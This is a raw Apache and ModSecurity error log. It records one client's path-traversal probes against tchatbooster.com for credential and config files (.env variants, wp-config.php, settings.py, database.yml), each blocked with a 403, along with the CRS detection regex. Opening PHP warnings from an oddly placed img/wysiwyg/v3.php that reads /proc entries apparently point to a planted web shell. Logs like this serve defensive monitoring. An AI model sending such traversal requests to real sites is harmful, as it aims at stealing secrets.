PHP Warning:  fileperms(): stat failed for /proc/1022/task/1022/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1022/task/1022/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1022/task/1022/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:40:31.948421 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTH9r1yOh9TvizeziQOwAAAFY"], referer: https://tchatbooster.com/files../../../.env
[Tue May 12 04:40:32.014136 2026] [core:error] [pid 1825179:tid 1825203] [client 45.148.10.166:64228] AH10244: invalid URI path (/files../../../../.env)
[Tue May 12 04:40:32.474014 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTINr1yOh9TvizeziQPgAAAFY"], referer: https://tchatbooster.com/files../../../../.env
[Tue May 12 04:40:32.474233 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env"] [unique_id "agKTINr1yOh9TvizeziQPgAAAFY"], referer: https://tchatbooster.com/files../../../../.env
[Tue May 12 04:40:32.952083 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTINr1yOh9TvizeziQPgAAAFY"], referer: https://tchatbooster.com/files../../../../.env
[Tue May 12 04:40:33.025546 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTIc1tk6y7yBJLpJoqKwAAAI8"]
[Tue May 12 04:40:33.025621 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTIc1tk6y7yBJLpJoqKwAAAI8"]
[Tue May 12 04:40:33.025798 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTIc1tk6y7yBJLpJoqKwAAAI8"]
[Tue May 12 04:40:33.473423 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTIc1tk6y7yBJLpJoqKwAAAI8"]
[Tue May 12 04:40:33.491080 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTIdr1yOh9TvizeziQPwAAAFY"], referer: https://tchatbooster.com/files../../.env.local
[Tue May 12 04:40:33.491295 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agKTIdr1yOh9TvizeziQPwAAAFY"], referer: https://tchatbooster.com/files../../.env.local
[Tue May 12 04:40:33.818848 2026] [ssl:error] [pid 1730207:tid 1730209] (EAI 2)Name or service not known: [client 3.87.132.21:59022] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:40:33.818904 2026] [ssl:error] [pid 1730207:tid 1730209] AH01941: stapling_renew_response: responder error
[Tue May 12 04:40:33.975009 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTIdr1yOh9TvizeziQPwAAAFY"], referer: https://tchatbooster.com/files../../.env.local
[Tue May 12 04:40:34.003040 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTIs1tk6y7yBJLpJoqLAAAAI8"]
[Tue May 12 04:40:34.003114 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTIs1tk6y7yBJLpJoqLAAAAI8"]
[Tue May 12 04:40:34.003287 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTIs1tk6y7yBJLpJoqLAAAAI8"]
[Tue May 12 04:40:34.197173 2026] [ssl:error] [pid 1820198:tid 1820217] (EAI 2)Name or service not known: [client 3.87.132.21:59032] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 04:40:34.197198 2026] [ssl:error] [pid 1820198:tid 1820217] AH01941: stapling_renew_response: responder error
[Tue May 12 04:40:34.447516 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTIs1tk6y7yBJLpJoqLAAAAI8"]
[Tue May 12 04:40:34.464796 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTItr1yOh9TvizeziQQgAAAFY"], referer: https://tchatbooster.com/files../../.env.production
[Tue May 12 04:40:34.465028 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.production"] [unique_id "agKTItr1yOh9TvizeziQQgAAAFY"], referer: https://tchatbooster.com/files../../.env.production
[Tue May 12 04:40:34.940643 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTItr1yOh9TvizeziQQgAAAFY"], referer: https://tchatbooster.com/files../../.env.production
[Tue May 12 04:40:34.969535 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTIs1tk6y7yBJLpJoqLQAAAI8"]
[Tue May 12 04:40:34.969606 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTIs1tk6y7yBJLpJoqLQAAAI8"]
[Tue May 12 04:40:34.969779 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTIs1tk6y7yBJLpJoqLQAAAI8"]
[Tue May 12 04:40:35.422076 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTIs1tk6y7yBJLpJoqLQAAAI8"]
[Tue May 12 04:40:35.444215 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTI9r1yOh9TvizeziQRAAAAFY"], referer: https://tchatbooster.com/files../../wp-config.php
[Tue May 12 04:40:35.444437 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/wp-config.php"] [unique_id "agKTI9r1yOh9TvizeziQRAAAAFY"], referer: https://tchatbooster.com/files../../wp-config.php
[Tue May 12 04:40:35.930588 2026] [security2:error] [pid 1825179:tid 1825220] [client 45.148.10.166:38918] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agKTI9r1yOh9TvizeziQRAAAAFY"], referer: https://tchatbooster.com/files../../wp-config.php
[Tue May 12 04:40:35.964614 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTI81tk6y7yBJLpJoqLgAAAI8"]
[Tue May 12 04:40:35.964827 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/app/etc/env.php"] [unique_id "agKTI81tk6y7yBJLpJoqLgAAAI8"]
[Tue May 12 04:40:36.405278 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTI81tk6y7yBJLpJoqLgAAAI8"]
[Tue May 12 04:40:36.926695 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTJM1tk6y7yBJLpJoqMAAAAI8"]
[Tue May 12 04:40:36.926935 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/settings.py"] [unique_id "agKTJM1tk6y7yBJLpJoqMAAAAI8"]
[Tue May 12 04:40:37.370139 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTJM1tk6y7yBJLpJoqMAAAAI8"]
[Tue May 12 04:40:37.904335 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTJc1tk6y7yBJLpJoqMQAAAI8"]
[Tue May 12 04:40:37.904538 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/database.yml"] [unique_id "agKTJc1tk6y7yBJLpJoqMQAAAI8"]
[Tue May 12 04:40:38.370278 2026] [security2:error] [pid 1820198:tid 1820215] [client 45.148.10.166:64234] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agKTJc1tk6y7yBJLpJoqMQAAAI8"]
